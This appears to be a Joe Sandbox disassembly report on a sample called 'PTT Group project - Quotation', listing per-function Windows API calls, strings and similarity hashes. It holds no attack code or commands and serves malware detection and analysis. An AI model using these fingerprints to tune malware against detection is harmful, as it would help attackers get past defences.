GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0097B7B1
GetLastError.KERNEL32 ref: 0097B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 0097B828

Strings

UNKNOWN, xrefs: 0097B7E0
READONLY, xrefs: 0097B7F3
INVALID, xrefs: 0097B7FA
READY, xrefs: 0097B801
NOTREADY, xrefs: 0097B7E7

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: da1d9deb9d152e4151b734c6335ed17a98155c9acc3e6e1272542e26a8662164
Instruction ID: 18bb5df1fb28e0858df27b9ab631954c68e7237d8fa91475839c3deabee03d5d
Opcode Fuzzy Hash: da1d9deb9d152e4151b734c6335ed17a98155c9acc3e6e1272542e26a8662164
Instruction Fuzzy Hash: AE318436A442099FDB14EF68C885FFEB7B8EF84704F14802AF509D7291DB719942C752

Function 00969471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

Part of subcall function 0096B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0096B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009694F6
GetDlgCtrlID.USER32 ref: 00969501
GetParent.USER32 ref: 0096951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00969520
GetDlgCtrlID.USER32(?), ref: 00969529
GetParent.USER32(?), ref: 00969545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00969548

Strings

ListBox, xrefs: 009694B3
ComboBox, xrefs: 0096947E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 931d3b221a2e331619b9015241a5bc89013dbf569d46b60cd67183d98d7cf6bf
Instruction ID: ab27006c9a745cd0d8ac847fea2dc62d1eb66523439ddf6b109fc5b34cb3fd0b
Opcode Fuzzy Hash: 931d3b221a2e331619b9015241a5bc89013dbf569d46b60cd67183d98d7cf6bf
Instruction Fuzzy Hash: 6121D670E04208BBDF05AB64CC95EFEBB79EF85300F10015AB962972E1DB755959DB20

Function 0096955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

Part of subcall function 0096B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0096B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009695DF
GetDlgCtrlID.USER32 ref: 009695EA
GetParent.USER32 ref: 00969606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00969609
GetDlgCtrlID.USER32(?), ref: 00969612
GetParent.USER32(?), ref: 0096962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00969631

Strings

ListBox, xrefs: 0096959E
ComboBox, xrefs: 00969569

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: a5d194cf88a45f4a0dbfca3756b57a4c0524476aa70b698699098c0b3d3a214d
Instruction ID: 8c381a9720fa62303217a6e0f54f0f3846ae0d48e6f4f3960a94b446cdafb63c
Opcode Fuzzy Hash: a5d194cf88a45f4a0dbfca3756b57a4c0524476aa70b698699098c0b3d3a214d
Instruction Fuzzy Hash: 1021C275A00208BBDF01ABA4CC95EFEBB79EF88300F100056F922972A1DB759959DB20

Function 00969645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00969651
GetClassNameW.USER32(00000000,?,00000100), ref: 00969666
_wcscmp.LIBCMT ref: 00969678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009696F3

Strings

details, xrefs: 009696A1
largeicons, xrefs: 00969687
SHELLDLL_DefView, xrefs: 00969672
smallicons, xrefs: 009696BB
list, xrefs: 009696D5

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: a469f65ee91ea9e7529d3af59cf5a81d6e2939c7e76e06fb1db6a0da654e456a
Instruction ID: 07fae26b8b792f6685953aa4852d110546540c6fcacaa44bf19df4a9809ade4e
Opcode Fuzzy Hash: a469f65ee91ea9e7529d3af59cf5a81d6e2939c7e76e06fb1db6a0da654e456a
Instruction Fuzzy Hash: 0611487668C347BAFA012724DC1BEA6B79CDB45374F20002BFD00E50E1FEB269109A59

Function 00988BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00988BEC
CoInitialize.OLE32(00000000), ref: 00988C19
CoUninitialize.OLE32 ref: 00988C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00988D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00988E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,009A2C0C), ref: 00988E84
CoGetObject.OLE32(?,00000000,009A2C0C,?), ref: 00988EA7
SetErrorMode.KERNEL32(00000000), ref: 00988EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00988F3A
VariantClear.OLEAUT32(?), ref: 00988F4A

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: f7d65f7855cc80463a959b47e04c029b092361bdee53c5b8439db0012c0f249b
Instruction ID: 879e2352e4490d81f886c816acf281e01c14ecdbe7f1014cf5bbc899e4766bb3
Opcode Fuzzy Hash: f7d65f7855cc80463a959b47e04c029b092361bdee53c5b8439db0012c0f249b
Instruction Fuzzy Hash: C5C12371208305AFC700EF68C884A6BB7E9BF89348F40495DF58ADB251DB31ED05CBA2

Function 00974189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0097419D
__swprintf.LIBCMT ref: 009741AA

Part of subcall function 009338D8: __woutput_l.LIBCMT ref: 00933931

FindResourceW.KERNEL32(?,?,0000000E), ref: 009741D4
LoadResource.KERNEL32(?,00000000), ref: 009741E0
LockResource.KERNEL32(00000000), ref: 009741ED
FindResourceW.KERNEL32(?,?,00000003), ref: 0097420D
LoadResource.KERNEL32(?,00000000), ref: 0097421F
SizeofResource.KERNEL32(?,00000000), ref: 0097422E
LockResource.KERNEL32(?), ref: 0097423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0097429B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 63d45a9f62db2321b9fe34d4e6a44ae3f14732a0e276cdf71e61165cabe1086f
Instruction ID: 64dfa8d2c89d2907f4bcbb3a86afed797672d85ac836f1c1b3f05ad94fe74868
Opcode Fuzzy Hash: 63d45a9f62db2321b9fe34d4e6a44ae3f14732a0e276cdf71e61165cabe1086f
Instruction Fuzzy Hash: 8231D67264921AAFCB119FA0DC54EBFBBACEF04301F008526F925D2152E774D961DBB1

Function 009716DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00971700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00970778,?,00000001), ref: 00971714
GetWindowThreadProcessId.USER32(00000000), ref: 0097171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00970778,?,00000001), ref: 0097172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0097173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00970778,?,00000001), ref: 00971755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00970778,?,00000001), ref: 00971767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00970778,?,00000001), ref: 009717AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00970778,?,00000001), ref: 009717C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00970778,?,00000001), ref: 009717CC

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 06ecf48b9dcb018344c932d49bc59ce5d60935fef9010a5ff17cffc13822c799
Instruction ID: 632dc412699a214695264b7fa48f483a545f5af40bc47d20c96860e42abdf85a
Opcode Fuzzy Hash: 06ecf48b9dcb018344c932d49bc59ce5d60935fef9010a5ff17cffc13822c799
Instruction Fuzzy Hash: 3431F272219308BFEB259F5CDD84F79BBEDEB05711F108026F808D62A0E7749D80AB60

Function 0091FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0091FC06
OleUninitialize.OLE32(?,00000000), ref: 0091FCA5
UnregisterHotKey.USER32(?), ref: 0091FDFC
DestroyWindow.USER32(?), ref: 00954A00
FreeLibrary.KERNEL32(?), ref: 00954A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00954A92

Strings

close all, xrefs: 0091FC01

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: f4a7f443af5c87af5b85865d16f3645af177367ecb1af301dfc80a7bd8e96581
Instruction ID: 3125064ed801e77216445f7a6f65bfb4d118b8582b313abefe4972dc94c06303
Opcode Fuzzy Hash: f4a7f443af5c87af5b85865d16f3645af177367ecb1af301dfc80a7bd8e96581
Instruction Fuzzy Hash: 9AA1A030701216CFCB69EF15C4A5BA9F368BF44705F5542ADE80AAB251CB30ED96CF94

Function 0096A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0096AA64), ref: 0096A9A2

Strings

CLASSNN, xrefs: 0096A744
INSTANCE, xrefs: 0096A8B0
CLASS, xrefs: 0096A721
NAME, xrefs: 0096A7D4
REGEXPCLASS, xrefs: 0096A767
TEXT, xrefs: 0096A8D9

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 094d255766a8a2a89d1add6a26b58cc0e43257ea8a6471873f5735cebe3e921e
Instruction ID: 8822e65e8beb05d5dc33071f9de54ab27482e304ebcf49c886c7852444e16306
Opcode Fuzzy Hash: 094d255766a8a2a89d1add6a26b58cc0e43257ea8a6471873f5735cebe3e921e
Instruction Fuzzy Hash: 6C91A770A0060AEBDB18DF60C491BE9FBB9BF44304F508519D89AB7191DF306A99DF91

Function 00912E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00912EAE

Part of subcall function 00911DB3: GetClientRect.USER32(?,?), ref: 00911DDC
Part of subcall function 00911DB3: GetWindowRect.USER32(?,?), ref: 00911E1D
Part of subcall function 00911DB3: ScreenToClient.USER32(?,?), ref: 00911E45

GetDC.USER32 ref: 0094CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0094CF95
SelectObject.GDI32(00000000,00000000), ref: 0094CFA3
SelectObject.GDI32(00000000,00000000), ref: 0094CFB8
ReleaseDC.USER32(?,00000000), ref: 0094CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0094D04B

Strings

U, xrefs: 0094CF20

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: de8d73da674eb399a1e2e2bc3f5d157ead646a2720f646022bfd64f415a028aa
Instruction ID: bae52f2045aad41ced2e313a770acfd32fcc48c4f299fcf82ad4b07c031502a6
Opcode Fuzzy Hash: de8d73da674eb399a1e2e2bc3f5d157ead646a2720f646022bfd64f415a028aa
Instruction Fuzzy Hash: 3F71F671501208EFCF219F64C884EFA7BBAFF49310F14426AED559B265C7358C91DB60

Function 0099C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00912612: GetWindowLongW.USER32(?,000000EB), ref: 00912623

Part of subcall function 00912344: GetCursorPos.USER32(?), ref: 00912357
Part of subcall function 00912344: ScreenToClient.USER32(009D67B0,?), ref: 00912374
Part of subcall function 00912344: GetAsyncKeyState.USER32(00000001), ref: 00912399
Part of subcall function 00912344: GetAsyncKeyState.USER32(00000002), ref: 009123A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0099C2E4
ImageList_EndDrag.COMCTL32 ref: 0099C2EA
ReleaseCapture.USER32 ref: 0099C2F0
SetWindowTextW.USER32(?,00000000), ref: 0099C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0099C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0099C48F

Strings

@GUI_DRAGFILE, xrefs: 0099C424
@GUI_DROPID, xrefs: 0099C3E1

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 8a628c5285336aba934478d7f0665bd81056d8d88f90c118818bd805a948c831
Instruction ID: 590de98f6f28badc887f56af70988bd80b058a8ad3ac286eb5bdd8dde15eba96
Opcode Fuzzy Hash: 8a628c5285336aba934478d7f0665bd81056d8d88f90c118818bd805a948c831
Instruction Fuzzy Hash: 57518F70248304AFDB10EF28CC56FAA7BE5EB88314F00452EF555872E1DB709994DB52

Function 00988F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0099F910), ref: 0098903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0099F910), ref: 00989071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009891EB
SysFreeString.OLEAUT32(?), ref: 00989215

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 8be2119c58ddffb109afc95fe73a938d1d6a623ecf028b72222cca38d8cb9d2d
Instruction ID: beeedae236db16a9cc076ead444642df1753374dd53a76e7a122b98b0226bb24
Opcode Fuzzy Hash: 8be2119c58ddffb109afc95fe73a938d1d6a623ecf028b72222cca38d8cb9d2d
Instruction Fuzzy Hash: 19F11871A04209EFDB04EF94C888EBEB7B9FF89314F148459F516AB290DB31AE45CB50

Function 0098F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0098F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0098FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0098FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0098FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0098FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0098FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0098FD90
CloseHandle.KERNEL32(?), ref: 0098FDBF
CloseHandle.KERNEL32(?), ref: 0098FE36

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 0ffb6182e92d041b5c7c54c74df2ec07109f7fe078c5b9a42473ad367dc59cc2
Instruction ID: b0e0017e53b34bed1a1ceef3bc9bef61da7a582b3aa5cf660e1f3621c241d987
Opcode Fuzzy Hash: 0ffb6182e92d041b5c7c54c74df2ec07109f7fe078c5b9a42473ad367dc59cc2
Instruction Fuzzy Hash: 5AE19F316043019FCB24EF24C8A1B6ABBE5AF85354F14896DF8999B3A2DB31DD44CF52

Function 00974F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009738D3,?), ref: 009748C7

Part of subcall function 009748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009738D3,?), ref: 009748E0

Part of subcall function 00974CD3: GetFileAttributesW.KERNEL32(?,00973947), ref: 00974CD4

lstrcmpiW.KERNEL32(?,?), ref: 00974FE2
_wcscmp.LIBCMT ref: 00974FFC
MoveFileW.KERNEL32(?,?), ref: 00975017

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 8527e1c48fa9e8bbda4314442c442df6aaca1098f2a98862ab7efeef49329ded
Instruction ID: 688a5e7a48f828d69c90f31fa29c49db2bc74d32184fa1ba1e20d8aa0e43384f
Opcode Fuzzy Hash: 8527e1c48fa9e8bbda4314442c442df6aaca1098f2a98862ab7efeef49329ded
Instruction Fuzzy Hash: 215174B250C7859BC764DB60C881ADFB3ECAFC5341F40492EF189C7152EF74A5888B66

Function 009988B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0099896E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 765ccf5031880fd2ce51c741addacb803e006f96bde16d211f46bafa51c8c33b
Instruction ID: e2f24fe8fff0282d57913e6d373741494bfd4f5812416407e41d4eb7c0dd91a0
Opcode Fuzzy Hash: 765ccf5031880fd2ce51c741addacb803e006f96bde16d211f46bafa51c8c33b
Instruction Fuzzy Hash: 4F51D330605208BFEF209F2DCC85BAB7B69FB07360F60451AF525E61A0CF75A990DB91

Function 00912B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0094C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0094C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0094C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0094C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0094C5C0
DestroyIcon.USER32(00000000), ref: 0094C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0094C5EC
